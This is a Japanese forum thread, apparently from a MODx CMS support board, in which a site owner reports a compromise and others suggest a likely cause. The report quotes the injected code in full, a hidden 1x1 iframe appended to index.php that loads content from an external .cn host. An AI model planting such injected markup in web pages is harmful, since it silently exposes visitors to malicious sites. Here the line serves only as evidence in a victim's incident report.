• クラック被害報告#

  • 29521
    2

    terra Reply #1, 3 years, 3 months ago

    Reply
    はじめまして。
    いつもお世話になっております。
    クラック被害と思われる現象に遭遇しましたので一応ご報告します。

    バージョン9.6.1p2
    バージョンアップしていなかったからかもしれません。

    【現象】
    サイトトップ
    indx.PHPが消去され
    index_tmp_26012009.php
    というファイルがあがっていました。
    このファイルの中身は通常のindx.PHPの最後に下記のタグが貼られていました。
    <html><body><iframe src="http://litetopfindworld.cn/in.cgi?cocacola30"
 width=1 height=1 style="visibility: hidden"></iframe></body></html>>

    説明が下手ですみません。

    とりあえずバージョンアップしてみます。



  • 36592
    970

    tkfm Reply #2, 3 years, 3 months ago

    Reply
    専門家じゃないので外しているかもしれませんが...
    これじゃないですかね?
    http://modxcms.com/forums/index.php/topic,21302.msg187240.html#msg187240


  • 29521
    2

    terra Reply #3, 3 years, 3 months ago

    Reply

    早速お返事ありがとうございます。

    ビンゴかもしれません。
    昔作ったフォームに飛ばすCGI-BINが混在しています。(modx外)
    その中のReflect機能をするページも同じように書き換えられていました。

    反省しています。

    因みにサーバの報告では最後にFTP接続があったのはドイツからだそうです。
    そして、中国のcgiをつかってロシアに飛ばす。
    何をされたのでしょうか?

    悪の組織の陰謀でしょうか?